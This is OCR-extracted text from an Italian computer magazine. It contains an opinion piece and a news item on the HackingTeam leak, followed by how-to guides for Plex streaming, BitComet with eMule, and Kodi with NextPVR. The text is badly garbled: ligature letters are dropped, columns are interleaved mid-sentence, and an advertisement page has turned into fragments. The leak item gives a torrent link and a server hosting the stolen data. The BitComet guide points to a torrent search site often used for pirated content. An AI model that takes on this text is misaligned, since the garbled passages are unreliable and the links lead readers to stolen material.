Come ripeto da anni i conini, una volta netti e distinti, tra il mondo dellhacking e del digital underground, il cybercrime, il cyber Espionage, linformation warfare e il cosiddetto controllo dellinformazione sono oramai
vacui, grigi, quasi senza distinzioni. Tutto ci, come ha dimostrato per primo
lo scandalo della NSA e le rivelazioni di Edward Snowden (il quale, come mio
parere personale, andrebbe insignito del premio Nobel per la Pace, come ho
detto pubblicamente pi volte), pericoloso, molto pericoloso.
inammissibile che unazienda operante in speciici settori (qui mi riferisco
nello speciico alle veriiche di sicurezza, i penetration test insomma) non
abbia i propri archivi su server cifrati e scollegati (of-line), quindi non accessibili
remotamente. Inoltre, non vi alcun bisogno ditenerei report di clienti per
cos tanti anni (alcuni dei leak erano risalenti addirittura al 2006/2008; teniamo
inoltre presente come HackingTeam abbia smesso di erogare questo servizio
circa 2-3 anni fa, in quanto il team che li eseguiva si distaccato dallazienda
madre e ha aperto una propria societ).
In un settore, un mercatogrigio, ci sono comunque delle regole che vanno
rispettate. Questo, a quanto sembra alla data in cui scrivo, non successo. Si
arrivati ad una situazione di onnipotenza eccessiva, pazzesca, non accettabile,
che ha portato - direttamente o indirettamente - a tutto questo.

In primo luogo, il codice sorgente dei trojan di HackingTeam ora disponibile a chiunque, in primis proprio a quei soggetti i quali erano oggetto di
interesse ed intercettazione da parte dei clienti dellazienda (tipicamente,
governi, forze dellordine e forze speciali, agenzie di intelligence).
In seconda istanza, tutte le comunicazioni interne (e-mail) dellazienda, sia tra
colleghi che da e verso i clienti, sono ormai pubbliche. Un danno immenso,
specialmente leggendo con attenzione alcune discussioni decisamente particolari, cos come il tono e le parole utilizzate verso alcuni soggetti e clienti.
Come terzo punto, lelenco stesso dei clienti. Quello del Lawful Interception
un mercato nel quale la riservatezza tutto, un aspetto peraltro comune a
tutto il mondo dellInformation Security. E qui abbiamo un secondo preoccupante risvolto di tutta la faccenda, certamente quello che si rivelato il pi
catastroico per HackingTeam: lapparente dimostrazione, apparenti prove ed
evidenze di aver venduto (o, quantomeno, intrapreso tentativi di prevendita)
ai cosiddetti Paesi canaglia, a regimi oppressivi e certamente discutibili, le
Bisogna fare attenzione e non dimenticare mai che si parla di persone, non
loro soluzioni.
solo di tecnologia. Viviamo in un mondo totalmente on-line, e dipendiamo
Proprio gli aspetti legati al mondo dellInformation Security rappresentano un sempre pi dallInformation Technology: tutto questo non un gioco. Come
ulteriore punto di discussione. HackingTeam, infatti, aveva deciso sin dallinizio disse una grande mente della storia: da una grande conoscenza derivano
di ofrire anche servizi di penetration testing e veriica delle vulnerabilit ai grandi responsabilit.

I TOOL DI SPIONAGGIO IN CHIARO SU GOOGLE


I dati riservati di HackingTeam e le e-mail scambiate dai dirigenti dellazienda milanese con i
loro clienti sono state pubblicate inizialmente
su WikiLeaks, ma piuttosto scomodo scaricarle
da tale sito, perch necessario selezionarle una
alla volta. Il pirata che ha cracckato i proili degli

Tutti i sorgenti delle vulnerabilit sfruttate


da HackingTeam sono state pubblicate on-line,
a disposizione di qualunque pirata informatico
volesse approfittarne per attaccare i nostri PC!

informatici, infatti, leggendo le e-mail pubblicate


su WikiLeaks ed i vari ile ad esse allegati, sono
riusciti a ricostruire parte della suite RCS. Al momento, naturalmente, il software incompleto, e
di fatto inutilizzabile. Tuttavia, si pu immaginare
che nel giro di qualche mese lintero RCS verr
ricostruito e sar perfettamente operativo. In quel
momento, chiunque sar in grado di utilizzarlo
per attaccare un qualsiasi sistema informatico.
Lunica soluzione consiste nella speranza che i
produttori di software, come Adobe, Microsoft
ed Apple correggano i bug nei loro programmi
prima che i pirati riescano ad utilizzare gli exploit
di HackingTeam. Naturalmente, fondamentale
che tutti gli utenti mantengano aggiornati i propri
computer, in modo da prevenire questo tipo di
minacce. Un pocome per un vaccino: se le azienIL CODICE SORGENTE DI RCS
de rilasceranno degli aggiornamenti risolutivi in
Il programma RCS, inoltre, sta inendo su GitHub breve tempo, sar possibile eradicare il problema,
(www.winmagazine.it/link/3216). Diversi pirati rendendo RCS di fatto inutile.
amministratori di sistema di HackingTeam ha
per caricato tutto il materiale rubato nella rete
torrent (http://infotomb.com/eyyxo.torrent) e su
un server HTTP (https://ht.transparencytoolkit.
org). Attenzione, per: ricordiamo che i download
torrent non sono anonimi, quindi se scarichiamo
questo ile potremo essere facilmente identiicabili. Naturalmente, molti curiosi stanno scaricando
questi messaggi senza curarsi troppo delle conseguenze legali. Tuttavia importante ricordare
che esiste anche un ulteriore problema: quello
della gestione della gran mole di dati. Infatti, per
riuscire a trovare qualcosa in oltre 400 GB di dati
necessario utilizzare strumenti statistici per isolare
le informazioni importanti da quelle irrilevanti e
per collegarle tra di loro.

Speciali Win Magazine 51

Cos fa lhacker

| Fai da te | Cinema in HD a costo zero |

Cinema in HD su
tablet e console
Trasforma il PC in unemittente TV
che trasmette ilm e serie TV ondemand a tutti i tuoi dispositivi
Cosa ci
occorre

20 MIN.
FACILE

SERVER MULTIMEDIALE

PLEX MEDIA
SERVER
SOFTWARE COMPLETO
Lo trovi su: DVD
Sito Internet:
www.plex.tv
CHIAVETTA ANDROID

GOOGLE
CHROMECAST
Quando costa: 35,00
Sito Internet:
www.winmagazine.
it/link/3154

l nostro senza dubbio il secolo dove essere connessi tecnologicamente gli uni con
gli altri divenuta lesigenza primaria di
buona parte della civilt occidentale (e non
solo). La diffusione dei telefoni cellulari alla
fine del secolo scorso stata propedeutica a
ci che da l a breve si sarebbe trasformata in
una rete di connessioni utile a far comunicare fra loro non solo le persone ma anche i
dispositivi elettronici che oggi sono in grado
di consigliarti se prendere lombrello prima
di uscire di casa e persino di rimproverarti
se stai lavorando troppo!

Dispositivi intelligenti
La capacit di un dispositivo di ricevere
informazioni e istruzioni da un altro dispositivo e agire di conseguenza oggi un
requisito fondamentale per conquistare la
definizione di smart. Ecco quindi entrare
nelle nostre case gli smartphone, gli smartwatch, le smart TV e via discorrendo: oggetti che non si limitano a svolgere il ruolo
al quale sono principalmente destinati, ma
che sono in grado di interfacciarsi fra loro
per assicurare ai loro utilizzatori unesperienza di utilizzo che qualche tempo fa era
semplicemente impensabile. In tempi non
troppo lontani per vedere un film scaricato
da Internet sul televisore eravamo costretti
ad acquistare delle interfacce in grado di
convertire il segnale VGA e trasferirlo alla
presa SCART della TV. In alternativa cera la
masterizzazione sul classico DVD o il piccolo
schermo del computer. Qualche tempo dopo,
una piccola rivoluzione tecnologica ha immesso sul mercato nuove apparecchiature
in grado di leggere buona parte dei formati
multimediali e trasferirli sul televisore senza
che fosse necessario collegare un computer:
tra questi, le Smart TV con gli ingressi USB
che potevano connettersi in rete e i lettori
Blu-ray compatibili con un numero sempre

Cos fa lhacker

| Cinema in HD a costo zero | Fai da te |

Una emittente TV personale


Scopriamo la procedura per installare sul PC Plex TV, da noi ribattezzato Cinema Media Server. Al termine
potremo avviarlo per trasmettere tutti i nostri contenuti in streaming ai computer della rete LAN.

Subito pronto alluso

Le librerie multimediali

Contenuti a portata di clic

Scompattiamo larchivio compresso PlexTV.


zip che troviamo nella sezione Internet del
Win DVD-Rom ed eseguiamo con un doppio clic sul
ile eseguibile contenuto al suo interno la semplice
procedura guidata di installazione. Al termine clicchiamo sul pulsante Launch.

Seguiamo la procedura guidata di conigurazione accettando i termini di servizio. Diamo un nome al server e nella schermata successiva
clicchiamo Aggiungi libreria per iniziare a creare le
nostre personali playlist scegliendo tra Film, Serie
TV, Musica, Foto e Home Videos.

Pratica interfaccia Web

Cosa vuoi riprodurre?

Raggiungiamo di nuovo il pannello di amministrazione del server cliccando col tasto


destro sullicona di Plex nella system tray di Windows. Selezioniamo la voce Media manager: il browser si aprir nuovamente mostrando linterfaccia di
Plex e i primi contenuti aggiunti.

Clicchiamo sullicona delle impostazioni in


alto a destra e veriichiamo che sia selezionata la schermata WEB. Selezioniamo la voce Riproduttore e regoliamo le impostazioni di qualit locale e
remota (e cio quale bitrate deve usare il server per
ricodiicare i contenuti da riprodurre).

Dopo aver completato la configurazione


accediamo al nostro Cinema Media Server
aprendo il browser in qualsiasi PC della rete locale
e digitando http://nomePC:32400/web/index.html
nella barra indirizzi, sostituendo a nomePC lIP del
computer su cui installato Plex.

DLNA, uno standard di trasmissione che


permetteva a dispositivi diversi tra di loro
di dialogare anche via wireless e comunque
allinterno della rete locale dove un server
(che deteneva i contenuti) si incaricava di
trasmettere un flusso video (uno stream) ad
un client nella maniera pi efficiente possibile. Mentre Apple costruiva il suo sistema
proprietario, AirPlay, lidea dei server multimediali si sviluppava superando il diffuso
ma limitato DLNA. Tra i nomi pi illustri
segnaliamo il progetto open source XBMC/
Kodi e il pi famoso Plex (da noi battezzato
come Cinema Media Server), un tool che
grazie ad unarchitettura multipiattaforma e

ad uninterfaccia di navigazione innovativa,


diventato uno standard utilizzabile su
qualsiasi dispositivo (persino il Raspberry
Pi). Con Plex potremmo controllare il catalogo multimediale dal cellulare ed utilizzare
Chromecast per vedere il nostro film della
sera sul 50 pollici del salotto e come installare il medesimo client anche sulle console
di gioco e sul mini computer Raspberry. E
nel caso in cui la nostra aspirazione fosse
quella di creare una rete televisiva tutta
nostra, impareremo anche ad attivare laccesso remoto a Plex per invitare gli amici a
sfogliare il nostro catalogo direttamente
da Internet.

crescente di codec, per non parlare dei Media


Box, degli hard disk multimediali ed infine
dei media server. Il dominio dei DVD e dei
supporti in genere era destinato a finire e
neanche lavanzata di un nuovo standard, il
Blu-ray, avrebbe cambiato le cose: le persone
avevano imparato a ignorare il mercato dei
supporti rinunciando allaltissima definizione e allaudio multicanale, a favore di file
che potevano essere riprodotti sul televisore
senza troppi traffici.

Levoluzione della specie


Nellambito dei media server la prima grande rivoluzione stata segnata dallarrivo del

Associamo a ogni playlist la cartella con i


contenuti cliccando su Browser for media
folder (alloccorrenza possiamo indicare anche pi
cartelle per ogni singola playlist). Terminiamo la creazione guidata cliccando Aggiungi libreria e confermando le schermate successive.

Iniziamo le trasmissioni

Speciali Win Magazine 53

Cos fa lhacker

| Fai da te | Cinema in HD a costo zero |

BUONI

UNA SEMPLICE INTERFACCIA WEB ORIENTED

CONSIGLI

La schermata principale di Plex accessibile da qualsiasi browser e permette non solo di riprodurre i contenuti
ma anche di conigurare e personalizzare ogni aspetto del server.

PLEX ANCHE
SUL NAS
Nel caso di installazione
su NAS, dobbiamo
tener presente che non
baster un dispositivo
a buon mercato in
quanto il server utilizza
la CPU (che nei NAS non
molto generosa) per
ricodiicare i ile. Una
volta installata lapplicazione suiciente
conigurare il server e
le librerie di contenuti
esattamente come
nellambiente Windows
e cio direttamente dal
browser, con la diferenza che il server Plex in
questo caso risiede su
un dispositivo diverso
dal nostro PC.

ATTIVIT
Mostra le attivit trascorse
e presenti sul server Plex,
inclusi i contenuti che
vengono riprodotti e i
dispositivi sui quali sono
trasmessi
IMPOSTAZIONI
Permette di conigurare

linterfaccia Web del


programma, le impostazioni
del server, aggiungere utenti
e amici ed inine veriicare i
dispositivi collegati

che richiediamo per


poterne poi controllare la
riproduzione mediante il
telecomando del televisore

Plex, visualizzare i contenuti


gi visti o quelli che
dobbiamo ancora vedere

Film, Spettacoli TV, Musica,


Foto, Home Videos

PULSANTE DI
RIPRODUZIONE
possibile inviare a
Chromecast il contenuto

ACCOUNT
Permette di accedere alla
conigurazione dellaccount,
impostare un PIN per
laccesso allinterfaccia di

LIBRERIE
Il pulsante + permette di
aggiungere al server le
cartelle del nostro hard disk
dove prelevare i contenuti
multimediali, ordinandoli per

HOME
In ogni momento
possiamo tornare alla
pagina principale dove
sono elencati tutti i
contenuti disponibili per la
riproduzione

Guardiamo i nostri ilm in TV grazie


La semplice modalit graica di Plex pu essere facilmente comandata anche dal nostro smartphone e permette
di gestire i video trasmessi sul televisore di casa al quale collegata la chiavetta multimediale di Google.

Collegamento in corso

La giusta qualit video

Dallo smartphone Android avviamo il Play


Store e cerchiamo lapp Plex for Android rilasciata da Plex, Inc.: tocchiamo Installa e poi Accetto
per avviare la semplice installazione. Al termine, logghiamoci al nostro account Plex e scegliamo dal menu
in alto il server al quale collegarci.

Apriamo il menu dellapplicazione e tappiamo


Impostazioni e poi su Video. Qui deiniamo la
qualit con la quale il server ricodiicher i nostri ile:
lasciamo le impostazioni di default se abbiamo una
ADSL a 8 Mbps. possibile deinire il bitrate per la
rete mobile in caso di fruizione fuori casa.

54 Win Magazine Speciali

Scegliamo il ilm da vedere

Raggiungiamo nuovamente il menu e selezioniamo una categoria (ad esempio TV Shows).


Nella schermata che segue tappiamo sul contenuto
di nostro piacimento. Alcuni contenuti, come le serie
TV, vengono raggruppate per episodi (un numero sulla
locandina indica gli episodi disponibili).

| Cinema in HD a costo zero | Fai da te |

Cos fa lhacker

Usiamo Plex anche da remoto


Aprendo le necessarie porte di comunicazione sul router, possiamo accedere a Plex e a tutti i nostri contenuti
multimediali anche al di fuori della rete locale utilizzando lo smartphone o il tablet.

Il canale di comunicazione

Accediamo alle impostazioni di Plex raggiungendo la scheda Server. Sulla sinistra selezioniamo la voce Remote Access. Qui annotiamo il
numero di porta 32400 utilizzata dal server di Plex.
Alloccorrenza, possiamo variarlo con quello che riteniamo pi adatto alle nostre esigenze.

Apriamo le porte del router

Nelle impostazioni del router attiviamo un Port


forwarding di porte (la procedura pu variare a seconda del modello) attivando sul nostro indirizzo IP (impostato come statico usando un servizio
come www.noip.com) un inoltro automatico dalla porta
esterna 32400 a quella interna 32400.

Accesso consentito

Attiviamo quindi laccesso remoto del server


Plex che ci confermer la sua disponibilit con
la frase Accessibile dallesterno della tua rete. Cliccando sul pulsante Mostra avanzate annotiamo lindirizzo IP pubblico attivo e comunichiamolo a chi desidera
accedere da remoto al server.

ad Android e Chromecast

Inizia la visione

Nel caso di un ilmato multilingua possiamo


scegliere la lingua della traccia audio e persino i sottotitoli (l dove questi siano, ovviamente, disponibili). Per vedere il contenuto clicchiamo sul pulsante
Riproduci e attendiamo che il contenuto venga riprodotto nel nostro smartphone.

Colleghiamoci a Chromecast

Per visualizzare il contenuto sul televisore tramite la chiavetta Google accendiamo la TV e


posizioniamoci sul canale corrispondente. Tappiamo
quindi sullicona in alto a destra che diventer visibile non appena lo smartphone riveler la chiavetta
multimediale e poi selezioniamo il nostro dispositivo.

Usiamo il telecomando

Il video in riproduzione sul cellulare si interromper mostrando solo la locandina, mentre il ilmato verr trasmesso sul televisore. A questo punto possiamo utilizzare le funzioni di pausa e di
riproduzione sul telecomando del televisore per controllare il contenuto.

Speciali Win Magazine 55

Cos fa lhacker
BUONI
CONSIGLI
VA BENE ANCHE
IL RASPBERRY
Sui mini computer
Raspberry, Plex disponibile solo come client e
per di pi non uiciale.
Tuttavia fa benissimo il
suo lavoro e permette di
ottenere unesperienza
molto simile a quella
dellapplicazione originale. A questo si aggiunga che lapplicazione RasPlex in questione
completamente
gratuita ed scaricabile
dal sito uiciale www.
rasplex.com.

Cinema anche sulle console


Il catalogo di Plex accessibile in modalit graica anche su PS3 (tramite DLNA) e Xbox. In
questultimo caso occorre usare lapp uficiale e sottoscrivere un Plex Pass. Ecco come fare.

VISIONI SENZA
INTERRUZIONI
Entrando su qualsiasi
contenuto nellinterfaccia principale di Plex
ed utilizzando il terzo
pulsante sulla sinistra,
possiamo creare delle
mini-playlist che differiscono dalle macro
categorie Film, Home
Video ecc. in quanto create manualmente con
lo scopo di raccogliere
pi contenuti da far
riprodurre in sequenza.
Possiamo creare ininite
playlist che saranno poi
rese disponibili su tutti i
client collegati al nostro
server.

| Fai da te | Cinema in HD a costo zero |

Accediamo a Plex da PS3

Dopo aver avviato la console Sony PlayStation 3 accediamo


alla schermata principale navigando ino alla voce Video
oppure Foto. Qui troveremo il nostro Plex Server. Selezioniamolo
premendo il tasto X sul joypad.

Navi are tramite il protocollo DLNA

La navigazione del catalogo sul server Plex avviene via


DLNA ed strutturata secondo cartelle nominate come le
nostre playlist, con la differenza che queste ultime utilizzano una
nomenclatura in lingua inglese facilmente comprensibile.

Installiamo Plex sulla Xbox

Accediamo al nostro account Xbox Live usando il gamertag


Xbox Live e cerchiamo lapplicazione Plex. Selezioniamola
e scarichiamola. Avviamola e appaiamo il nostro account Plex
con lapp per la console Microsoft Xbox.

Riproduciamo un ilm sulla console

Colleghiamoci a https://plex.tv/pin e digitiamo il numero


mostrato a video. Dalla Xbox navighiamo nel nostro catalogo
e, se in possesso di Kinect, possiamo controllare la riproduzione anche
con la voce e i movimenti della mano.

INSTALLIAMO PLEX ANCHE SULLA NOSTRA SMART TV


Lapplicazione Plex disponibile anche
per molti modelli di Smart TV. La procedura di installazione dellapplicazione
identica a quella appena vista per le console di gioco. Il sistema mostra un PIN
a video che va confermato loggandosi
col proprio account Plex e raggiungendo questo indirizzo https://plex.tv/pin.
Come per la console Xbox, anche sulle
Smart TV lapplicazione Plex disponibile solo per chi dispone di un Plex Pass.

56 Win Magazine Speciali

ABBONATI A
WIN MAGAZINE
Collegati all'indirizzo hp://abbonamenti.edmaster.it/winmagazine
e scopri le nostre oerte di abbonamento
Win
Mag
azin
e
N 4
(177
)

VERS

IONE

Riv

BASE

ta+
C 2is
,99 CD

Win Magazin

VERSIONE BASE

VERSIONE PLUS

Rivista
+CD C 2,99

VERSIONE DVD

Rivista
+DVD C3,99

Rivista
+DVD DL C 5,99

NOVIT

VERSIONE GOLD

IONE

Riv

PLUS

VERS

IONE

DV
Rivis D
t

NOVIT

VERSIONE DEV

Rivista
+2DVD C 9,99

VERS

ista+
C 3,9
D
9 VD

LA R
VERSIONE MUSIC

Rivista
+CD+libro C 6,99

Rivista+CD Audio
+Web CD C 7,99

TUTTA LA TV

Rivista + I DVD di Win Magazine


N. 54 a E 5,99 in pi
Rivista + Win Junior N. 30 a E
9,99
Rivista + Il meglio di Win Magazinein pi
N. 1 a E 9,99 in pi

E!

TE
O PER
L
O
S
ALO
IN REG
E GOLD

VERSION
E DVD

VERSION
E PLUS

VERSION

Rivista3,99
C
+DVD

E BASE

VERSION

NOVITE DEV
VERSION
Rivista C 6,99
libro
+CD+

9 in pi
a E 5,9 0 in pi
9,9
ine N. 55
Magaz ine N. 2 a E a E 9,90 in pi
di Win
gaz
N. 1
+ I DVD
0 in pi
Win Ma c e iPhone
Rivista
a E 9,9
glio di
+ Il me
Corso Ma o e Video N. 1
Rivista + Il meglio di
Fot
so
Rivista Il meglio di Cor
+
ista
Riv

www

LE
IS

lo
own
ca d
bloc
Lo s

DE D
UPLOA

r
wse
Il bro
ad

AL
5/01/CS/C
DCDC/03
- Aut. N.
662/96

S
ati AD
certiic
Dati

IN ITA

NOW V

IDEO

GAT
R APID

NT
R FAIVCIRUS
e so
EB
iario fatware com OOK
l riparo pleti
p

da m er met
alinte tere
nzion
ati

ow
Wind

TORRE

nte,

liceme

Semp

n
agazi OR

matico nuovi sit nt Premiu


e senz i di le
m
a attes
e p. 66 hosting

MUL
NT E

IL I HACKERSU!L CD
DEGRLSIONE COMPLETA
IN VE

to

anon
igazione

grato
 Nav
virus inte imitati
 Anti
load ill t
n
w
o
D
n

torre

di le di ricerca
Motoretutto!
scova ratica a p. 4
p
La guida

MANE
HI DA S
TRUCC

li
deg

B Legge
ma 20/
Art. 2 Com

79)
N 6 (1

Anno cit mensil


Periodi

nload
r il dow net
e
p
i
it
s
llInter
ettonati
ai pi g i, entrando nearicare
o
s
s
e
c
c
t
c
i! I pira
cano la
troscena
ri per s
rit blocmusica e giocphassare i filt ine ti svela i re
to
u
A
e
L
a by
i film,
Magaz
veloce dile, riesconoa banda! Win
t
ib
t
Invis mente a tu
!
nuova
ZZESCO

P
BE: STO
YOUTUPUBBLdIi Ci vIidTeodelsi
ALLASolo coeslimtiingaondo cqi fausistitidio
Tubo gli per gli a
EO
consi
CON VIM

azz
tti p
S ca
er
ack

GR

state
r l'e
i pe

PA

S !

im!
za S
sen
ratis
na g
lefo
Te

miti
senza ili
re
a
m
hia telefonic
nimo
to per c
ri
o segredegli operato a con il numero ano
d
o
m
n
C u do a meno are chi ti telefon
gam
facen
come s
ri
I Scop
ED IN P

;,9
504(:
,+0A06

il pieno
Vuoi fareb? Solo noi
e
sul W o come ren
diciam ogni foto pri
unica blicarla su
di pub ok & co.
facebo

CD
S SUL
GR ATI

l sEtGaAtLO

LAN

UO CE
E R IL T
P
O
T
R
TIFU

LL U L A

CHE

s
e
a
La guidva app Home il diario anchti
la nuolet, consultareessaggi segre
e tab e, inviare m
off-lin

scura
mera oAdobe
ta
a
rg
a
nuovi
ata daidigitali!

ra
g
o

Sc tt

NA AN

I PENSA
C
:
3
1
0
2
ESAMOI CELLUreLpAaraRteE perccati!
IILtruTcchUi e le easpapmpiisepnza essere be
agli
copiare
RIAMO
HACKBEOOK r installare ne
FACE unofcial pe u smartpho

FUNZIO

RE p. 118

S
INDOW
W
O
B
TUR UN
COoNPC ha pers
Il tu mpo? Ecc
di un te cuperare
fargli reza, grinta
poten abilit
e afd

OF T
D IL S
SUL C

O
MPLET

CO
WARE

FIL

PREEMSHARING
IUM
lo noi ti
C
A
R
r scaric regaliamo
l'Accou D
uto are dai

r it
edmaste

13
NO 20
GIUGXVI, n. 6 (179)e

A DI
IVISTATICA
R
A
L ORM GIA
INF ECNOLO TA
E T VENDU
PIU
LIA

ie A

NOVITE MUSIC
dio
VERSION
+CD Au
Rivista C 7,99
CD
+Web

45%
in A.P. dizione
iane Spe
Poste Ital

e
agazin
Win M

Rivista99
2,
+CD C

Rivista C 5,99
DL
+DVD

Rivista 12,99
C
+2DVD

nto
c'
iaro:

IN SIVA
LU

ESC

re

Cos fa lhacker

| Fai da te | eMule&Torrent |

eMule &Torrent
lunione fa la forza!
Abbiamo scovato il software per accedere contemporaneamente
a tutte le reti Peer to Peer. Provare per scaricare a mille!

ncora una volta gli smanettoni


sono riusciti nellintento, escogitando un metodo del tutto
nuovo che consente di massimizzare la
velocit di download dei file attraverso
il protocollo torrent (P2P) e quello di
eMule (ED2K). Le velocit raggiunte
sono impressionanti, superano addirittura il megabit al secondo (MB/s),
a conferma dellottimo lavoro svolto.
Nellera digitale dove i contenuti aumentano continuamente in dimensione (nei file multimediali, ad esempio,
la causa il crescente aumento nella
definizione dellimmagini), avere a
disposizione un client capace di sfrut-

tare appieno la banda a disposizione


sicuramente un vantaggio da non
sottovalutare.

Semplice, ma efficace
Al contrario delle normali tecniche presenti in Rete, che alle volte si rivelano
soltanto dei metodi fraudolenti volti a
spillare denaro nelle tasche dei poveri
utenti, la procedura utilizzata risiede
nella combinazione di strumenti gi
noti, ma che nessuno fino ad ora aveva
pensato di accoppiare. Il client, che ha
sviluppato per prima questa novit,
il famoso BitComet, conosciuto sulla
scena perch presente nella lista dei

client torrent pi utilizzati al mondo.


Inoltre, i motivi che rendono BitComet
appetibile sono da ricercare nella curata
interfaccia grafica, nellefficienza e nella possibilit di sfruttare pi protocolli
di scambio dati per il download (FTP,
HTTP, P2P e il nuovo ED2K). Infine,
plug-in extra appositamente realizzati
completano il tutto: come non citare
il famoso FLV Player che permette di
visualizzare i file video in formato FLV
e FLV Converter utile nella conversione
di file video FLV in formati come AVI,
WMV, MP4, iPod, PSP. Scopriamo dunque quali sono i passi da compiere per
massimizzare la velocit dei download.

Cosa ci
occorre

20 MIN.
FACILE

CLIENT P2P

BITCOMET
Lo trovi su: DVD
SOFTWARE COMPLETO
Sito Internet:
www.bitcomet.com

Coniguriamo il client P2P


Ecco come installare BitComet e massimizzare la velocit di download. Ricordiamo che non lutilizzo del
software a essere illegale, ma leventuale materiale che si scarica da Internet se protetto da copyright.

Bastano pochi clic

Dalla sezione Internet del Win DVD-Rom scarichiamo sul nostro hard
disk larchivio compresso BitComet.zip. Scompattiamolo quindi in una
qualsiasi cartella (va benissimo anche il Desktop di Windows): al suo interno
troveremo sia la versione a 32 bit sia quella a 64 bit del client.

58 Win Magazine Speciali

Software pronto alluso

Scelta la versione adatta al nostro sistema operativo, clicchiamo due


volte sul ile eseguibile per avviare linstallazione. Autorizziamo il software cliccando Ulteriori Informazioni/Esegui comunque. Procediamo con Avanti
nei successivi passi evitando di installare i plug-in pubblicitari.

Cos fa lhacker

| eMule&Torrent | Fai da te |

Scarichiamo a tutta birra


Terminata linstallazione del client BitComet, possiamo procedere con lattivazione e la conigurazione del plug-in
che permette di scaricare contemporaneamente anche dalle reti E2DK usate da eMule. Vediamo in che modo.

Il plu -in per eMule

Dal menu principale di BitComet spostiamoci


in Strumenti/Plugin di eMule/Abilita Plugin.
Dopo aver confermato lintenzione di scaricarlo, attendiamo il termine del download. Al termine rechiamoci
nella cartella contenete il ile e clicchiamoci sopra due
volte per installare il plug-in.

Abilitiamolo per usarlo

Installato BitComet, riavviamolo. Nella sezione


Strumenti/Plugin di eMule clicchiamo Abilita
Plugin. Attendiamo il messaggio di avvenuta abilitazione e seguiamo la procedura guidata. Diamo un nome
al server e nella schermata successiva clicchiamo
Aggiungi libreria per creare le nostre personali playlist.

Cerchiamo un ile su torrent

Per mettere il turbo ai download, scarichiamo un ile .torrent e apriamolo con BitComet.
Avviato il download, accediamo al menu Strumenti/
Plugin di eMule/Mostra. Avviato il plug-in di eMule
clicchiamo su Connect. Da questo momento, tutti i
download potranno usare anche la rete ED2K.

Apriamo le porte del router

Accediamo allinterfaccia Web di conigurazione del router digitando 192.168.1.1 nella


barra indirizzi del browser. In Avanzate/Port forwarding inseriamo lindirizzo IP locale del PC, il protocollo
(TCP e UDP) e il numero di porta (esterna e interna)
consigliato dal plug-in di eMule.

e sulle reti ED2K

Prima di procedere, veriichiamo il corretto


funzionamento del plug-in appena attivato.
Non dobbiamo fare altro che cliccare col tasto destro
del mouse sul ile .torrent in download, cliccare Propriet e controllare che nella scheda Avanzate ci sia
la spunta su Ricerca sorgenti di eMule.

Download contemporanei

Nel tab File posta in basso selezioniamo col


tasto destro del mouse il ile in download e dal
menu contestuale clicchiamo Cerca il link E2DK per
questo ile. Se lo troviamo, clicchiamo Imposta ed2k
e riavviamo BitComet afinch le modiiche possano
massimizzare la velocit di download.

IL TRUCCO PER VELOCIZZARE IL DOWNLOAD DEI TORRENT


Per incrementare al massimo la velocit di download di un ile .torrent con
BitComet utile aggiungere quanti pi tracker possibili al ile, in modo
da aumentare le fonti per il download. Per farlo, suiciente scaricare
lo stesso ile .torrent da pi siti Web che lo condividono e aggiungerlo
alla lista di scaricamento. Possiamo usare uno dei tanti Torrent Search
Engine, come il CorsaroNero (http://ilcorsaronero.info). Attraverso la
barra di ricerca si pu scovare il contenuto dinteresse e, nella scheda del
contenuto, copiarne il codice HASH. Selezioniamo ora il ile in download
col tasto destro del mouse e clicchiamo Cerca: si aprir una nuova scheda
del browser nella quale sar possibile collegarsi ai portali che mettono
a disposizione il ile per il download. Scaricati i ile torrent, baster un
doppio clic per consentire a BitComet di acquisire le fonti.
Speciali Win Magazine 59

Cos fa lhacker

| Fai da te | Tutta la TV dalletere al PC |

TV in chiaro
sul mio PC

Cosa ci
occorre

20 MIN.
FACILE

MEDIA CENTER

KODI
Lo trovi su: DVD
SOFTWARE COMPLETO
Sito Internet:
http://kodi.tv
VIDEO RECORDER

NEXTPVR

Ecco come trasformare il computer in un decoder per


visualizzare i canali satellitari e del digitale terrestre

Lo trovi su: DVD


SOFTWARE COMPLETO
Sito Internet:
www.nextpvr.com
CODEC AUDIO/VIDEO

FFDSHOW

ello scorso numero di Win Magazine abbiamo visto come utilizzare Kodi per vedere canali e
programmi in streaming via Internet,
ma questo media center pu fare molto
dipi.Se,infatti,sulcomputerabbiamo
installato un sintonizzatore digitale
terreste o satellitare, o anche entrambi,
possiamo gestirlo comodamente attraverso Kodi, utilizzandolo come un vero
epropriodecoder.Unavoltasintonizzati
i canali potremo gestire tutto dal telecomando, proprio come faremmo con
un comune decoder, dimenticandoci
che stiamo gestendo, invece, un PC;

potremo inoltre creare delle liste personalizzate in base ai nostri interessi e


registrare i nostri programmi preferiti,
in diretta o mediante un timer, direttamente sullhard disk del nostro PC.

Tutto il palinsesto
Per fare ci, come abbiamo detto,
necessario che nel computer su cui
gira Kodi sia installata una scheda
per la sintonia dei programmi con i
relativi driver: pu essere una comune chiavetta USB per la ricezione del
segnale digitale terrestre oppure una
scheda per la ricezione dei segnali

satellitari. Queste ultime sono solitamente interne, da montare su uno


slot PCI del PC, ma ne esistono anche
di esterne, sempre con connessione
USB. Oltre a Kodi e al sintonizzatore,
abbiamo bisogno di un ultimo componente, il software NextPVR (www.
nextpvr.com): questo programma si
occupa di fare da ponte tra il sintonizzatore e Kodi catturando il flusso
audio/video proveniente dalla scheda
eindirizzandoloalmediacenter.Forza
allora, cosa aspettiamo? Trasformiamo il nostro PC in un completo media
center tuttofare.

Lo trovi su: DVD


SOFTWARE COMPLETO
Sito Internet:
http://sourceforge.net

Installiamo il video recorder


Il setup e una semplice conigurazione di NextPVR ci consentiranno di gestire tutti i sintonizzatori da un unico
software. Ecco la procedura giusta da seguire per essere subito operativi.

Si parte dal CD

Troviamo NextPVR nella sezione


Audio&Video del Win DVD ROM. Salviamo larchivio compresso NextPVR.zip sul
Desktop, quindi estraiamolo e avviamo linstallazione del software cliccando due volte sul ile
eseguibile contenuto al suo interno e seguendo
la procedura guidata ino al termine.

60 Win Magazine Speciali

Coni urazione di base

Eseguiamo NextPVR: sulla schermata blu


che appare clicchiamo con il tasto destro
del mouse e selezioniamo Settings, quindi clicchiamo sul tab Misc nella colonna di destra. In
Live TV Buffer clicchiamo su Browse e selezioniamo una cartella per il buffer dello stream, ad
esempio Download.

Decoder audio e video

In Decoders, alle voci MPEG2 Video e


H.264 Video selezioniamo Microsoft
DTV-DVD Video Decoder e, in MPEG1 Audio,
Microsoft DTV-DVD Audio Decoder. In Recording/Recording directories clicchiamo Add e
selezioniamo la cartella in cui andremo a registrare i programmi. Chiudiamo NextPVR.

Cos fa lhacker

| Tutta la TV dalletere al PC | Fai da te |

La TV arriva sul computer


